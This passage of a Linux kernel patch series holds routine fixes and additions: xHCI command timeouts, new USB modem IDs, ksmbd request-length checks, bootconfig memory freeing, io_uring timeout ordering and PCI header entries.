++		xhci_mod_cmd_timer(xhci);
+ 		xhci_ring_cmd_db(xhci);
+ 	}
+ }
+@@ -1762,7 +1763,7 @@ static void handle_cmd_completion(struct xhci_hcd *xhci,
+ 	if (!list_is_singular(&xhci->cmd_list)) {
+ 		xhci->current_cmd = list_first_entry(&cmd->cmd_list,
+ 						struct xhci_command, cmd_list);
+-		xhci_mod_cmd_timer(xhci, XHCI_CMD_DEFAULT_TIMEOUT);
++		xhci_mod_cmd_timer(xhci);
+ 	} else if (xhci->current_cmd == cmd) {
+ 		xhci->current_cmd = NULL;
+ 	}
+@@ -4339,7 +4340,7 @@ static int queue_command(struct xhci_hcd *xhci, struct xhci_command *cmd,
+ 	/* if there are no other commands queued we start the timeout timer */
+ 	if (list_empty(&xhci->cmd_list)) {
+ 		xhci->current_cmd = cmd;
+-		xhci_mod_cmd_timer(xhci, XHCI_CMD_DEFAULT_TIMEOUT);
++		xhci_mod_cmd_timer(xhci);
+ 	}
+ 
+ 	list_add_tail(&cmd->cmd_list, &xhci->cmd_list);
+diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c
+index 565aba6b99860..27e01671d3865 100644
+--- a/drivers/usb/host/xhci.c
++++ b/drivers/usb/host/xhci.c
+@@ -4170,12 +4170,18 @@ int xhci_alloc_dev(struct usb_hcd *hcd, struct usb_device *udev)
+ 	return 0;
+ }
+ 
+-/*
+- * Issue an Address Device command and optionally send a corresponding
+- * SetAddress request to the device.
++/**
++ * xhci_setup_device - issues an Address Device command to assign a unique
++ *			USB bus address.
++ * @hcd: USB host controller data structure.
++ * @udev: USB dev structure representing the connected device.
++ * @setup: Enum specifying setup mode: address only or with context.
++ * @timeout_ms: Max wait time (ms) for the command operation to complete.
++ *
++ * Return: 0 if successful; otherwise, negative error code.
+  */
+ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev,
+-			     enum xhci_setup_dev setup)
++			     enum xhci_setup_dev setup, unsigned int timeout_ms)
+ {
+ 	const char *act = setup == SETUP_CONTEXT_ONLY ? "context" : "address";
+ 	unsigned long flags;
+@@ -4232,6 +4238,7 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev,
+ 	}
+ 
+ 	command->in_ctx = virt_dev->in_ctx;
++	command->timeout_ms = timeout_ms;
+ 
+ 	slot_ctx = xhci_get_slot_ctx(xhci, virt_dev->in_ctx);
+ 	ctrl_ctx = xhci_get_input_control_ctx(virt_dev->in_ctx);
+@@ -4358,14 +4365,16 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev,
+ 	return ret;
+ }
+ 
+-static int xhci_address_device(struct usb_hcd *hcd, struct usb_device *udev)
++static int xhci_address_device(struct usb_hcd *hcd, struct usb_device *udev,
++			       unsigned int timeout_ms)
+ {
+-	return xhci_setup_device(hcd, udev, SETUP_CONTEXT_ADDRESS);
++	return xhci_setup_device(hcd, udev, SETUP_CONTEXT_ADDRESS, timeout_ms);
+ }
+ 
+ static int xhci_enable_device(struct usb_hcd *hcd, struct usb_device *udev)
+ {
+-	return xhci_setup_device(hcd, udev, SETUP_CONTEXT_ONLY);
++	return xhci_setup_device(hcd, udev, SETUP_CONTEXT_ONLY,
++				 XHCI_CMD_DEFAULT_TIMEOUT);
+ }
+ 
+ /*
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index fc25a5b09710c..fa9e87141e0bf 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -815,6 +815,8 @@ struct xhci_command {
+ 	struct completion		*completion;
+ 	union xhci_trb			*command_trb;
+ 	struct list_head		cmd_list;
++	/* xHCI command response timeout in milliseconds */
++	unsigned int			timeout_ms;
+ };
+ 
+ /* drop context bitmasks */
+@@ -1574,8 +1576,11 @@ struct xhci_td {
+ 	unsigned int		num_trbs;
+ };
+ 
+-/* xHCI command default timeout value */
+-#define XHCI_CMD_DEFAULT_TIMEOUT	(5 * HZ)
++/*
++ * xHCI command default timeout value in milliseconds.
++ * USB 3.2 spec, section 9.2.6.1
++ */
++#define XHCI_CMD_DEFAULT_TIMEOUT	5000
+ 
+ /* command descriptor */
+ struct xhci_cd {
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 1a3e5a9414f07..b5ee8518fcc78 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -255,6 +255,10 @@ static void option_instat_callback(struct urb *urb);
+ #define QUECTEL_PRODUCT_EM061K_LMS		0x0124
+ #define QUECTEL_PRODUCT_EC25			0x0125
+ #define QUECTEL_PRODUCT_EM060K_128		0x0128
++#define QUECTEL_PRODUCT_EM060K_129		0x0129
++#define QUECTEL_PRODUCT_EM060K_12a		0x012a
++#define QUECTEL_PRODUCT_EM060K_12b		0x012b
++#define QUECTEL_PRODUCT_EM060K_12c		0x012c
+ #define QUECTEL_PRODUCT_EG91			0x0191
+ #define QUECTEL_PRODUCT_EG95			0x0195
+ #define QUECTEL_PRODUCT_BG96			0x0296
+@@ -1218,6 +1222,18 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_128, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_129, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_129, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_129, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12a, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12a, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12a, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12b, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12b, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12b, 0xff, 0xff, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12c, 0xff, 0xff, 0x30) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12c, 0xff, 0x00, 0x40) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM060K_12c, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0x00, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(QUECTEL_VENDOR_ID, QUECTEL_PRODUCT_EM061K_LCN, 0xff, 0xff, 0x40) },
+@@ -1360,6 +1376,12 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = NCTRL(2) | RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x1083, 0xff),	/* Telit FE990 (ECM) */
+ 	  .driver_info = NCTRL(0) | RSVD(1) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x10a0, 0xff),	/* Telit FN20C04 (rmnet) */
++	  .driver_info = RSVD(0) | NCTRL(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x10a4, 0xff),	/* Telit FN20C04 (rmnet) */
++	  .driver_info = RSVD(0) | NCTRL(3) },
++	{ USB_DEVICE_INTERFACE_CLASS(TELIT_VENDOR_ID, 0x10a9, 0xff),	/* Telit FN20C04 (rmnet) */
++	  .driver_info = RSVD(0) | NCTRL(2) | RSVD(3) | RSVD(4) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910),
+ 	  .driver_info = NCTRL(0) | RSVD(1) | RSVD(3) },
+ 	{ USB_DEVICE(TELIT_VENDOR_ID, TELIT_PRODUCT_ME910_DUAL_MODEM),
+@@ -2052,6 +2074,10 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(3) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(LONGCHEER_VENDOR_ID, 0x9803, 0xff),
+ 	  .driver_info = RSVD(4) },
++	{ USB_DEVICE(LONGCHEER_VENDOR_ID, 0x9b05),	/* Longsung U8300 */
++	  .driver_info = RSVD(4) | RSVD(5) },
++	{ USB_DEVICE(LONGCHEER_VENDOR_ID, 0x9b3c),	/* Longsung U9300 */
++	  .driver_info = RSVD(0) | RSVD(4) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, ZOOM_PRODUCT_4597) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, IBALL_3_5G_CONNECT) },
+ 	{ USB_DEVICE(HAIER_VENDOR_ID, HAIER_PRODUCT_CE100) },
+@@ -2272,15 +2298,29 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(0x2cb7, 0x010b, 0xff, 0xff, 0x30) },	/* Fibocom FG150 Diag */
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(0x2cb7, 0x010b, 0xff, 0, 0) },		/* Fibocom FG150 AT */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0111, 0xff) },			/* Fibocom FM160 (MBIM mode) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0115, 0xff),			/* Fibocom FM135 (laptop MBIM) */
++	  .driver_info = RSVD(5) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a0, 0xff) },			/* Fibocom NL668-AM/NL652-EU (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a2, 0xff) },			/* Fibocom FM101-GL (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a3, 0xff) },			/* Fibocom FM101-GL (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a4, 0xff),			/* Fibocom FM101-GL (laptop MBIM) */
+ 	  .driver_info = RSVD(4) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0a04, 0xff) },			/* Fibocom FM650-CN (ECM mode) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0a05, 0xff) },			/* Fibocom FM650-CN (NCM mode) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0a06, 0xff) },			/* Fibocom FM650-CN (RNDIS mode) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0a07, 0xff) },			/* Fibocom FM650-CN (MBIM mode) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2df3, 0x9d03, 0xff) },			/* LongSung M5710 */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x305a, 0x1404, 0xff) },			/* GosunCn GM500 RNDIS */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x305a, 0x1405, 0xff) },			/* GosunCn GM500 MBIM */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x305a, 0x1406, 0xff) },			/* GosunCn GM500 ECM/NCM */
++	{ USB_DEVICE(0x33f8, 0x0104),						/* Rolling RW101-GL (laptop RMNET) */
++	  .driver_info = RSVD(4) | RSVD(5) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x01a2, 0xff) },			/* Rolling RW101-GL (laptop MBIM) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x01a3, 0xff) },			/* Rolling RW101-GL (laptop MBIM) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x01a4, 0xff),			/* Rolling RW101-GL (laptop MBIM) */
++	  .driver_info = RSVD(4) },
++	{ USB_DEVICE_INTERFACE_CLASS(0x33f8, 0x0115, 0xff),			/* Rolling RW135-GL (laptop MBIM) */
++	  .driver_info = RSVD(5) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(OPPO_VENDOR_ID, OPPO_PRODUCT_R11, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x30) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x40) },
+diff --git a/fs/nilfs2/dir.c b/fs/nilfs2/dir.c
+index decd6471300b0..760405da852f6 100644
+--- a/fs/nilfs2/dir.c
++++ b/fs/nilfs2/dir.c
+@@ -243,7 +243,7 @@ nilfs_filetype_table[NILFS_FT_MAX] = {
+ 
+ #define S_SHIFT 12
+ static unsigned char
+-nilfs_type_by_mode[S_IFMT >> S_SHIFT] = {
++nilfs_type_by_mode[(S_IFMT >> S_SHIFT) + 1] = {
+ 	[S_IFREG >> S_SHIFT]	= NILFS_FT_REG_FILE,
+ 	[S_IFDIR >> S_SHIFT]	= NILFS_FT_DIR,
+ 	[S_IFCHR >> S_SHIFT]	= NILFS_FT_CHRDEV,
+diff --git a/fs/smb/common/smb2pdu.h b/fs/smb/common/smb2pdu.h
+index a3936ff53d9d0..25383b11d01b9 100644
+--- a/fs/smb/common/smb2pdu.h
++++ b/fs/smb/common/smb2pdu.h
+@@ -699,7 +699,7 @@ struct smb2_close_rsp {
+ 	__le16 StructureSize; /* 60 */
+ 	__le16 Flags;
+ 	__le32 Reserved;
+-	struct_group(network_open_info,
++	struct_group_attr(network_open_info, __packed,
+ 		__le64 CreationTime;
+ 		__le64 LastAccessTime;
+ 		__le64 LastWriteTime;
+diff --git a/fs/smb/server/server.c b/fs/smb/server/server.c
+index 11b201e6ee44b..63b01f7d97031 100644
+--- a/fs/smb/server/server.c
++++ b/fs/smb/server/server.c
+@@ -167,20 +167,17 @@ static void __handle_ksmbd_work(struct ksmbd_work *work,
+ 	int rc;
+ 	bool is_chained = false;
+ 
+-	if (conn->ops->allocate_rsp_buf(work))
+-		return;
+-
+ 	if (conn->ops->is_transform_hdr &&
+ 	    conn->ops->is_transform_hdr(work->request_buf)) {
+ 		rc = conn->ops->decrypt_req(work);
+-		if (rc < 0) {
+-			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
+-			goto send;
+-		}
+-
++		if (rc < 0)
++			return;
+ 		work->encrypted = true;
+ 	}
+ 
++	if (conn->ops->allocate_rsp_buf(work))
++		return;
++
+ 	rc = conn->ops->init_rsp_hdr(work);
+ 	if (rc) {
+ 		/* either uid or tid is not correct */
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index c02b1772cb807..34d88425434ab 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -534,6 +534,10 @@ int smb2_allocate_rsp_buf(struct ksmbd_work *work)
+ 	if (cmd == SMB2_QUERY_INFO_HE) {
+ 		struct smb2_query_info_req *req;
+ 
++		if (get_rfc1002_len(work->request_buf) <
++		    offsetof(struct smb2_query_info_req, OutputBufferLength))
++			return -EINVAL;
++
+ 		req = smb2_get_msg(work->request_buf);
+ 		if ((req->InfoType == SMB2_O_INFO_FILE &&
+ 		     (req->FileInfoClass == FILE_FULL_EA_INFORMATION ||
+diff --git a/fs/smb/server/vfs.c b/fs/smb/server/vfs.c
+index fe2c80ea2e47e..a4c99ec38faca 100644
+--- a/fs/smb/server/vfs.c
++++ b/fs/smb/server/vfs.c
+@@ -746,10 +746,15 @@ int ksmbd_vfs_rename(struct ksmbd_work *work, const struct path *old_path,
+ 		goto out4;
+ 	}
+ 
++	/*
++	 * explicitly handle file overwrite case, for compatibility with
++	 * filesystems that may not support rename flags (e.g: fuse)
++	 */
+ 	if ((flags & RENAME_NOREPLACE) && d_is_positive(new_dentry)) {
+ 		err = -EEXIST;
+ 		goto out4;
+ 	}
++	flags &= ~(RENAME_NOREPLACE);
+ 
+ 	if (old_child == trap) {
+ 		err = -EINVAL;
+diff --git a/fs/sysfs/file.c b/fs/sysfs/file.c
+index a12ac0356c69c..f21e73d107249 100644
+--- a/fs/sysfs/file.c
++++ b/fs/sysfs/file.c
+@@ -450,6 +450,8 @@ struct kernfs_node *sysfs_break_active_protection(struct kobject *kobj,
+ 	kn = kernfs_find_and_get(kobj->sd, attr->name);
+ 	if (kn)
+ 		kernfs_break_active_protection(kn);
++	else
++		kobject_put(kobj);
+ 	return kn;
+ }
+ EXPORT_SYMBOL_GPL(sysfs_break_active_protection);
+diff --git a/include/linux/bootconfig.h b/include/linux/bootconfig.h
+index ca73940e26df8..4195444ec45d1 100644
+--- a/include/linux/bootconfig.h
++++ b/include/linux/bootconfig.h
+@@ -287,7 +287,12 @@ int __init xbc_init(const char *buf, size_t size, const char **emsg, int *epos);
+ int __init xbc_get_info(int *node_size, size_t *data_size);
+ 
+ /* XBC cleanup data structures */
+-void __init xbc_exit(void);
++void __init _xbc_exit(bool early);
++
++static inline void xbc_exit(void)
++{
++	_xbc_exit(false);
++}
+ 
+ /* XBC embedded bootconfig data in kernel */
+ #ifdef CONFIG_BOOT_CONFIG_EMBED
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index f5d89a4b811f1..4da7411da9baf 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -1383,6 +1383,7 @@ int pci_load_and_free_saved_state(struct pci_dev *dev,
+ 				  struct pci_saved_state **state);
+ int pci_platform_power_transition(struct pci_dev *dev, pci_power_t state);
+ int pci_set_power_state(struct pci_dev *dev, pci_power_t state);
++int pci_set_power_state_locked(struct pci_dev *dev, pci_power_t state);
+ pci_power_t pci_choose_state(struct pci_dev *dev, pm_message_t state);
+ bool pci_pme_capable(struct pci_dev *dev, pci_power_t state);
+ void pci_pme_active(struct pci_dev *dev, bool enable);
+@@ -1553,6 +1554,8 @@ int pci_scan_bridge(struct pci_bus *bus, struct pci_dev *dev, int max,
+ 
+ void pci_walk_bus(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
+ 		  void *userdata);
++void pci_walk_bus_locked(struct pci_bus *top, int (*cb)(struct pci_dev *, void *),
++			 void *userdata);
+ int pci_cfg_space_size(struct pci_dev *dev);
+ unsigned char pci_bus_max_busnr(struct pci_bus *bus);
+ void pci_setup_bridge(struct pci_bus *bus);
+@@ -1884,6 +1887,8 @@ static inline int pci_save_state(struct pci_dev *dev) { return 0; }
+ static inline void pci_restore_state(struct pci_dev *dev) { }
+ static inline int pci_set_power_state(struct pci_dev *dev, pci_power_t state)
+ { return 0; }
++static inline int pci_set_power_state_locked(struct pci_dev *dev, pci_power_t state)
++{ return 0; }
+ static inline int pci_wake_from_d3(struct pci_dev *dev, bool enable)
+ { return 0; }
+ static inline pci_power_t pci_choose_state(struct pci_dev *dev,
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 73cc1e7dd15ad..9e9794d03c9fc 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -158,6 +158,8 @@
+ 
+ #define PCI_VENDOR_ID_LOONGSON		0x0014
+ 
++#define PCI_VENDOR_ID_SOLIDIGM		0x025e
++
+ #define PCI_VENDOR_ID_TTTECH		0x0357
+ #define PCI_DEVICE_ID_TTTECH_MC322	0x000a
+ 
+diff --git a/include/linux/switchtec.h b/include/linux/switchtec.h
+index 48fabe36509ee..8d8fac1626bd9 100644
+--- a/include/linux/switchtec.h
++++ b/include/linux/switchtec.h
+@@ -41,6 +41,7 @@ enum {
+ enum switchtec_gen {
+ 	SWITCHTEC_GEN3,
+ 	SWITCHTEC_GEN4,
++	SWITCHTEC_GEN5,
+ };
+ 
+ struct mrpc_regs {
+diff --git a/include/linux/usb/hcd.h b/include/linux/usb/hcd.h
+index 5a89928ea9534..cd667acf62672 100644
+--- a/include/linux/usb/hcd.h
++++ b/include/linux/usb/hcd.h
+@@ -371,8 +371,9 @@ struct hc_driver {
+ 		 * or bandwidth constraints.
+ 		 */
+ 	void	(*reset_bandwidth)(struct usb_hcd *, struct usb_device *);
+-		/* Returns the hardware-chosen device address */
+-	int	(*address_device)(struct usb_hcd *, struct usb_device *udev);
++		/* Set the hardware-chosen device address */
++	int	(*address_device)(struct usb_hcd *, struct usb_device *udev,
++				  unsigned int timeout_ms);
+ 		/* prepares the hardware to send commands to the device */
+ 	int	(*enable_device)(struct usb_hcd *, struct usb_device *udev);
+ 		/* Notifies the HCD after a hub descriptor is fetched.
+diff --git a/include/linux/usb/quirks.h b/include/linux/usb/quirks.h
+index eeb7c2157c72f..59409c1fc3dee 100644
+--- a/include/linux/usb/quirks.h
++++ b/include/linux/usb/quirks.h
+@@ -72,4 +72,7 @@
+ /* device has endpoints that should be ignored */
+ #define USB_QUIRK_ENDPOINT_IGNORE		BIT(15)
+ 
++/* short SET_ADDRESS request timeout */
++#define USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT	BIT(16)
++
+ #endif /* __LINUX_USB_QUIRKS_H */
+diff --git a/include/net/dsa.h b/include/net/dsa.h
+index ee369670e20e4..f96b61d9768e0 100644
+--- a/include/net/dsa.h
++++ b/include/net/dsa.h
+@@ -968,6 +968,14 @@ struct dsa_switch_ops {
+ 			       struct phy_device *phy);
+ 	void	(*port_disable)(struct dsa_switch *ds, int port);
+ 
++	/*
++	 * Compatibility between device trees defining multiple CPU ports and
++	 * drivers which are not OK to use by default the numerically smallest
++	 * CPU port of a switch for its local ports. This can return NULL,
++	 * meaning "don't know/don't care".
++	 */
++	struct dsa_port *(*preferred_default_local_cpu_port)(struct dsa_switch *ds);
++
+ 	/*
+ 	 * Port's MAC EEE settings
+ 	 */
+diff --git a/include/net/netfilter/nf_flow_table.h b/include/net/netfilter/nf_flow_table.h
+index 4a767b3d20b9d..df7775afb92b9 100644
+--- a/include/net/netfilter/nf_flow_table.h
++++ b/include/net/netfilter/nf_flow_table.h
+@@ -335,7 +335,7 @@ int nf_flow_rule_route_ipv6(struct net *net, struct flow_offload *flow,
+ int nf_flow_table_offload_init(void);
+ void nf_flow_table_offload_exit(void);
+ 
+-static inline __be16 nf_flow_pppoe_proto(const struct sk_buff *skb)
++static inline __be16 __nf_flow_pppoe_proto(const struct sk_buff *skb)
+ {
+ 	__be16 proto;
+ 
+@@ -351,6 +351,16 @@ static inline __be16 nf_flow_pppoe_proto(const struct sk_buff *skb)
+ 	return 0;
+ }
+ 
++static inline bool nf_flow_pppoe_proto(struct sk_buff *skb, __be16 *inner_proto)
++{
++	if (!pskb_may_pull(skb, PPPOE_SES_HLEN))
++		return false;
++
++	*inner_proto = __nf_flow_pppoe_proto(skb);
++
++	return true;
++}
++
+ #define NF_FLOW_TABLE_STAT_INC(net, count) __this_cpu_inc((net)->ft.stat->count)
+ #define NF_FLOW_TABLE_STAT_DEC(net, count) __this_cpu_dec((net)->ft.stat->count)
+ #define NF_FLOW_TABLE_STAT_INC_ATOMIC(net, count)	\
+diff --git a/include/trace/events/rpcgss.h b/include/trace/events/rpcgss.h
+index 3f121eed369e8..894d9fc8bd94a 100644
+--- a/include/trace/events/rpcgss.h
++++ b/include/trace/events/rpcgss.h
+@@ -587,7 +587,7 @@ TRACE_EVENT(rpcgss_context,
+ 		__field(unsigned int, timeout)
+ 		__field(u32, window_size)
+ 		__field(int, len)
+-		__string(acceptor, data)
++		__string_len(acceptor, data, len)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -596,7 +596,7 @@ TRACE_EVENT(rpcgss_context,
+ 		__entry->timeout = timeout;
+ 		__entry->window_size = window_size;
+ 		__entry->len = len;
+-		strncpy(__get_str(acceptor), data, len);
++		__assign_str(acceptor, data);
+ 	),
+ 
+ 	TP_printk("win_size=%u expiry=%lu now=%lu timeout=%u acceptor=%.*s",
+diff --git a/include/uapi/linux/pci_regs.h b/include/uapi/linux/pci_regs.h
+index 57b8e2ffb1dd3..3325155036c80 100644
+--- a/include/uapi/linux/pci_regs.h
++++ b/include/uapi/linux/pci_regs.h
+@@ -1043,6 +1043,7 @@
+ #define  PCI_EXP_DPC_STATUS_INTERRUPT	    0x0008 /* Interrupt Status */
+ #define  PCI_EXP_DPC_RP_BUSY		    0x0010 /* Root Port Busy */
+ #define  PCI_EXP_DPC_STATUS_TRIGGER_RSN_EXT 0x0060 /* Trig Reason Extension */
++#define  PCI_EXP_DPC_RP_PIO_FEP		    0x1f00 /* RP PIO First Err Ptr */
+ 
+ #define PCI_EXP_DPC_SOURCE_ID		 0x0A	/* DPC Source Identifier */
+ 
+diff --git a/init/main.c b/init/main.c
+index ccde19e7275fa..2c339793511b5 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -633,6 +633,8 @@ static void __init setup_command_line(char *command_line)
+ 	if (!saved_command_line)
+ 		panic("%s: Failed to allocate %zu bytes\n", __func__, len + ilen);
+ 
++	len = xlen + strlen(command_line) + 1;
++
+ 	static_command_line = memblock_alloc(len, SMP_CACHE_BYTES);
+ 	if (!static_command_line)
+ 		panic("%s: Failed to allocate %zu bytes\n", __func__, len);
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 68f1b6f8699a6..958c3b6190205 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2426,6 +2426,14 @@ static int io_cqring_wait(struct io_ring_ctx *ctx, int min_events,
+ 			return 0;
+ 	} while (ret > 0);
+ 
++	if (uts) {
++		struct timespec64 ts;
++
++		if (get_timespec64(&ts, uts))
++			return -EFAULT;
++		timeout = ktime_add_ns(timespec64_to_ktime(ts), ktime_get_ns());
++	}
++
+ 	if (sig) {
+ #ifdef CONFIG_COMPAT
+ 		if (in_compat_syscall())
+@@ -2439,14 +2447,6 @@ static int io_cqring_wait(struct io_ring_ctx *ctx, int min_events,
+ 			return ret;
+ 	}
+ 
+-	if (uts) {
+-		struct timespec64 ts;
+-
+-		if (get_timespec64(&ts, uts))
+-			return -EFAULT;
+-		timeout = ktime_add_ns(timespec64_to_ktime(ts), ktime_get_ns());
+-	}
+-
+ 	init_waitqueue_func_entry(&iowq.wq, io_wake_function);
+ 	iowq.wq.private = current;
+ 	INIT_LIST_HEAD(&iowq.wq.entry);
+diff --git a/lib/bootconfig.c b/lib/bootconfig.c
+index c59d26068a640..8841554432d5b 100644
+--- a/lib/bootconfig.c
++++ b/lib/bootconfig.c
+@@ -61,9 +61,12 @@ static inline void * __init xbc_alloc_mem(size_t size)
+ 	return memblock_alloc(size, SMP_CACHE_BYTES);
+ }
+ 
+-static inline void __init xbc_free_mem(void *addr, size_t size)
++static inline void __init xbc_free_mem(void *addr, size_t size, bool early)
+ {
+-	memblock_free(addr, size);
++	if (early)
++		memblock_free(addr, size);
++	else if (addr)
++		memblock_free_late(__pa(addr), size);
+ }
+ 
+ #else /* !__KERNEL__ */
+@@ -73,7 +76,7 @@ static inline void *xbc_alloc_mem(size_t size)
+ 	return malloc(size);
+ }
+ 
+-static inline void xbc_free_mem(void *addr, size_t size)
++static inline void xbc_free_mem(void *addr, size_t size, bool early)
+ {
+ 	free(addr);
+ }
+@@ -904,13 +907,13 @@ static int __init xbc_parse_tree(void)
+  * If you need to reuse xbc_init() with new boot config, you can
+  * use this.
+  */
+-void __init xbc_exit(void)
++void __init _xbc_exit(bool early)
+ {
+-	xbc_free_mem(xbc_data, xbc_data_size);
++	xbc_free_mem(xbc_data, xbc_data_size, early);
+ 	xbc_data = NULL;
+ 	xbc_data_size = 0;
+ 	xbc_node_num = 0;
+-	xbc_free_mem(xbc_nodes, sizeof(struct xbc_node) * XBC_NODE_MAX);
++	xbc_free_mem(xbc_nodes, sizeof(struct xbc_node) * XBC_NODE_MAX, early);
+ 	xbc_nodes = NULL;
+ 	brace_index = 0;
+ }
+@@ -963,7 +966,7 @@ int __init xbc_init(const char *data, size_t size, const char **emsg, int *epos)
+ 	if (!xbc_nodes) {
+ 		if (emsg)
+ 			*emsg = "Failed to allocate bootconfig nodes";
+-		xbc_exit();
++		_xbc_exit(true);
+ 		return -ENOMEM;
+ 	}
+ 	memset(xbc_nodes, 0, sizeof(struct xbc_node) * XBC_NODE_MAX);
+@@ -977,7 +980,7 @@ int __init xbc_init(const char *data, size_t size, const char **emsg, int *epos)
+ 			*epos = xbc_err_pos;
+ 		if (emsg)
+ 			*emsg = xbc_err_msg;
+-		xbc_exit();
++		_xbc_exit(true);
+ 	} else
+ 		ret = xbc_node_num;
+ 
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index 5b846ed5dcbe9..be58ce9992595 100644
